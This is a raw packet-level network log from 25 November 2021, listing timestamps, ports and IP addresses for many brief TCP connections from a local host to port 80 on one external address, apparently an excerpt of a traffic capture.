Nov 25, 2021 10:51:18.704102039 CET	50213	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:18.705661058 CET	50213	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:18.739733934 CET	80	50213	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:18.739916086 CET	50213	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:18.774059057 CET	80	50213	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:18.794755936 CET	80	50213	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:18.794821024 CET	80	50213	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:18.795012951 CET	50213	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:18.795109034 CET	50213	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:18.829291105 CET	80	50213	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:19.130918026 CET	50214	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:19.165009975 CET	80	50214	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:19.165265083 CET	50214	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:19.166858912 CET	50214	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:19.200849056 CET	80	50214	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:19.201040983 CET	50214	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:19.235116005 CET	80	50214	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:19.286577940 CET	80	50214	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:19.286648989 CET	80	50214	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:19.286952972 CET	50214	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:19.287053108 CET	50214	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:19.321309090 CET	80	50214	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:19.682492971 CET	50215	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:19.716670990 CET	80	50215	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:19.716929913 CET	50215	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:19.718416929 CET	50215	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:19.752441883 CET	80	50215	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:19.752697945 CET	50215	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:19.786761999 CET	80	50215	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:19.802609921 CET	80	50215	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:19.802685022 CET	80	50215	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:19.802797079 CET	50215	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:19.802840948 CET	50215	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:19.836894035 CET	80	50215	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:20.189712048 CET	50216	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:20.223201990 CET	80	50216	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:20.223422050 CET	50216	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:20.224991083 CET	50216	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:20.258362055 CET	80	50216	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:20.258569956 CET	50216	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:20.292161942 CET	80	50216	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:20.308312893 CET	80	50216	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:20.308367968 CET	80	50216	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:20.308545113 CET	50216	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:20.308644056 CET	50216	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:20.342386007 CET	80	50216	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:20.689922094 CET	50217	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:20.723284960 CET	80	50217	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:20.723496914 CET	50217	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:20.725136042 CET	50217	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:20.758346081 CET	80	50217	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:20.758601904 CET	50217	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:20.791728973 CET	80	50217	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:20.808254004 CET	80	50217	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:20.808300018 CET	80	50217	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:20.808674097 CET	50217	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:20.808742046 CET	50217	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:20.842197895 CET	80	50217	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:21.120682955 CET	50218	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:21.154552937 CET	80	50218	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:21.154804945 CET	50218	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:21.156398058 CET	50218	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:21.190428019 CET	80	50218	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:21.190673113 CET	50218	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:21.224687099 CET	80	50218	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:21.242856979 CET	80	50218	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:21.242932081 CET	80	50218	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:21.243130922 CET	50218	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:21.243201017 CET	50218	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:21.277152061 CET	80	50218	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:21.625438929 CET	50219	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:21.658863068 CET	80	50219	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:21.659185886 CET	50219	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:21.660669088 CET	50219	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:21.693980932 CET	80	50219	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:21.694211960 CET	50219	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:21.727631092 CET	80	50219	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:21.743335962 CET	80	50219	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:21.743391991 CET	80	50219	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:21.743685007 CET	50219	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:21.743768930 CET	50219	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:21.777466059 CET	80	50219	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:22.129579067 CET	50220	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:22.163737059 CET	80	50220	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:22.164138079 CET	50220	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:22.171066046 CET	50220	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:22.205185890 CET	80	50220	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:22.205435991 CET	50220	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:22.239610910 CET	80	50220	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:22.257762909 CET	80	50220	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:22.257818937 CET	80	50220	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:22.257958889 CET	50220	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:22.258018970 CET	50220	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:22.292222023 CET	80	50220	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:22.615093946 CET	50221	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:22.648560047 CET	80	50221	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:22.648813009 CET	50221	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:22.650389910 CET	50221	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:22.683835030 CET	80	50221	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:22.684088945 CET	50221	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:22.717519999 CET	80	50221	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:22.733273029 CET	80	50221	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:22.733328104 CET	80	50221	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:22.733510017 CET	50221	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:22.733593941 CET	50221	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:22.767195940 CET	80	50221	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:23.109164000 CET	50222	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:23.142625093 CET	80	50222	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:23.142805099 CET	50222	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:23.144422054 CET	50222	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:23.177834988 CET	80	50222	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:23.178015947 CET	50222	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:23.211623907 CET	80	50222	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:23.227411985 CET	80	50222	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:23.227475882 CET	80	50222	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:23.227672100 CET	50222	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:23.227771044 CET	50222	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:23.261543989 CET	80	50222	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:23.616971016 CET	50223	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:23.650962114 CET	80	50223	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:23.651313066 CET	50223	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:23.652940035 CET	50223	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:23.686881065 CET	80	50223	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:23.687066078 CET	50223	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:23.721129894 CET	80	50223	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:23.736828089 CET	80	50223	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:23.736907005 CET	80	50223	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:23.737025976 CET	50223	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:23.737152100 CET	50223	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:23.771053076 CET	80	50223	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:24.075139999 CET	50224	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:24.108393908 CET	80	50224	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:24.108527899 CET	50224	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:24.110114098 CET	50224	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:24.143246889 CET	80	50224	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:24.143414021 CET	50224	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:24.176583052 CET	80	50224	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:24.195945024 CET	80	50224	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:24.196052074 CET	80	50224	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:24.196201086 CET	50224	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:24.196212053 CET	50224	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:24.229374886 CET	80	50224	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:24.569730043 CET	50225	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:24.603903055 CET	80	50225	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:24.604135036 CET	50225	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:24.605767965 CET	50225	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:24.639713049 CET	80	50225	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:24.639946938 CET	50225	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:24.674068928 CET	80	50225	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:24.701908112 CET	80	50225	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:24.701958895 CET	80	50225	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:24.702157974 CET	50225	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:24.702208996 CET	50225	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:24.736712933 CET	80	50225	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:25.099024057 CET	50226	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:25.132644892 CET	80	50226	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:25.132891893 CET	50226	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:25.134458065 CET	50226	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:25.167965889 CET	80	50226	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:25.168150902 CET	50226	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:25.201725006 CET	80	50226	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:25.217587948 CET	80	50226	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:25.217643976 CET	80	50226	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:25.217925072 CET	50226	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:25.218005896 CET	50226	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:25.251425982 CET	80	50226	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:25.608994007 CET	50227	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:25.643124104 CET	80	50227	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:25.643307924 CET	50227	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:25.644833088 CET	50227	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:25.678880930 CET	80	50227	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:25.679064035 CET	50227	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:25.713054895 CET	80	50227	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:25.729237080 CET	80	50227	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:25.729285955 CET	80	50227	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:25.729435921 CET	50227	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:25.729471922 CET	50227	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:25.763454914 CET	80	50227	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:26.087198019 CET	50228	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:26.121391058 CET	80	50228	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:26.121643066 CET	50228	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:26.123163939 CET	50228	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:26.157219887 CET	80	50228	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:26.157428026 CET	50228	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:26.191643953 CET	80	50228	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:26.210153103 CET	80	50228	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:26.210216999 CET	80	50228	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:26.210367918 CET	50228	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:26.210432053 CET	50228	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:26.244729996 CET	80	50228	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:26.591545105 CET	50229	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:26.624902964 CET	80	50229	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:26.625091076 CET	50229	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:26.626689911 CET	50229	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:26.660006046 CET	80	50229	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:26.660278082 CET	50229	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:26.693644047 CET	80	50229	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:26.710566998 CET	80	50229	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:26.710616112 CET	80	50229	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:26.710855961 CET	50229	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:26.710912943 CET	50229	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:26.744374037 CET	80	50229	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:27.063693047 CET	50230	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:27.097532988 CET	80	50230	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:27.097702980 CET	50230	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:27.099309921 CET	50230	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:27.132559061 CET	80	50230	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:27.132802010 CET	50230	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:27.166079998 CET	80	50230	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:27.182981014 CET	80	50230	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:27.183028936 CET	80	50230	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:27.183228016 CET	50230	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:27.183278084 CET	50230	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:27.216628075 CET	80	50230	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:27.552145004 CET	50231	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:27.586273909 CET	80	50231	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:27.586559057 CET	50231	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:27.588196039 CET	50231	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:27.622175932 CET	80	50231	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:27.622354984 CET	50231	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:27.656511068 CET	80	50231	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:27.675956011 CET	80	50231	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:27.676021099 CET	80	50231	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:27.676213026 CET	50231	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:27.676306963 CET	50231	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:27.710736036 CET	80	50231	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:28.028701067 CET	50232	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:28.061960936 CET	80	50232	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:28.062129974 CET	50232	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:28.063643932 CET	50232	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:28.096740961 CET	80	50232	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:28.096844912 CET	50232	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:28.130036116 CET	80	50232	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:28.145936966 CET	80	50232	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:28.145965099 CET	80	50232	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:28.146111012 CET	50232	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:28.146157026 CET	50232	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:28.179425955 CET	80	50232	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:28.519404888 CET	50233	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:28.553406954 CET	80	50233	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:28.553601980 CET	50233	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:28.555424929 CET	50233	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:28.589443922 CET	80	50233	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:28.589751005 CET	50233	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:28.623826027 CET	80	50233	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:28.639452934 CET	80	50233	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:28.639503002 CET	80	50233	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:28.639714956 CET	50233	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:28.639779091 CET	50233	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:28.673908949 CET	80	50233	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:29.015284061 CET	50234	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:29.048453093 CET	80	50234	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:29.048619986 CET	50234	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:29.050192118 CET	50234	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:29.083364964 CET	80	50234	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:29.083579063 CET	50234	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:29.116887093 CET	80	50234	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:29.132563114 CET	80	50234	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:29.132616997 CET	80	50234	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:29.132791042 CET	50234	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:29.132841110 CET	50234	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:29.166233063 CET	80	50234	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:29.510804892 CET	50235	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:29.544820070 CET	80	50235	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:29.545131922 CET	50235	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:29.546638012 CET	50235	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:29.580738068 CET	80	50235	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:29.580894947 CET	50235	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:29.614877939 CET	80	50235	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:29.630446911 CET	80	50235	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:29.630496025 CET	80	50235	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:29.630650043 CET	50235	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:29.630700111 CET	50235	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:29.664705992 CET	80	50235	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:30.030478001 CET	50236	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:30.063993931 CET	80	50236	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:30.064188004 CET	50236	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:30.065751076 CET	50236	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:30.099020958 CET	80	50236	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:30.099304914 CET	50236	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:30.132613897 CET	80	50236	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:30.148468018 CET	80	50236	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:30.148528099 CET	80	50236	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:30.148665905 CET	50236	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:30.148720026 CET	50236	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:30.182039022 CET	80	50236	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:30.535671949 CET	50237	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:30.569190979 CET	80	50237	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:30.569402933 CET	50237	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:30.571082115 CET	50237	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:30.604491949 CET	80	50237	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:30.604705095 CET	50237	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:30.638216972 CET	80	50237	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:30.656665087 CET	80	50237	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:30.656721115 CET	80	50237	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:30.656902075 CET	50237	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:30.656985044 CET	50237	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:30.690716028 CET	80	50237	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:31.051575899 CET	50238	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:31.085670948 CET	80	50238	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:31.085947990 CET	50238	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:31.087433100 CET	50238	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:31.121567965 CET	80	50238	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:31.121891022 CET	50238	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:31.156495094 CET	80	50238	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:31.172842026 CET	80	50238	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:31.172905922 CET	80	50238	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:31.173085928 CET	50238	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:31.173150063 CET	50238	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:31.207298994 CET	80	50238	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:31.570261955 CET	50239	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:31.603674889 CET	80	50239	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:31.603916883 CET	50239	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:31.605421066 CET	50239	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:31.638668060 CET	80	50239	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:31.638880968 CET	50239	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:31.672344923 CET	80	50239	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:31.694789886 CET	80	50239	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:31.694854021 CET	80	50239	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:31.695058107 CET	50239	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:31.695118904 CET	50239	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:31.728792906 CET	80	50239	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:32.085475922 CET	50240	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:32.119604111 CET	80	50240	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:32.119891882 CET	50240	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:32.121427059 CET	50240	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:32.155436039 CET	80	50240	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:32.155625105 CET	50240	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:32.189659119 CET	80	50240	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:32.205734968 CET	80	50240	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:32.205790997 CET	80	50240	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:32.206073999 CET	50240	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:32.206196070 CET	50240	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:32.240303040 CET	80	50240	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:32.591900110 CET	50241	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:32.625349998 CET	80	50241	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:32.625627995 CET	50241	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:32.627207994 CET	50241	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:32.660593033 CET	80	50241	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:32.660856009 CET	50241	80	192.168.11.20	176.223.209.128
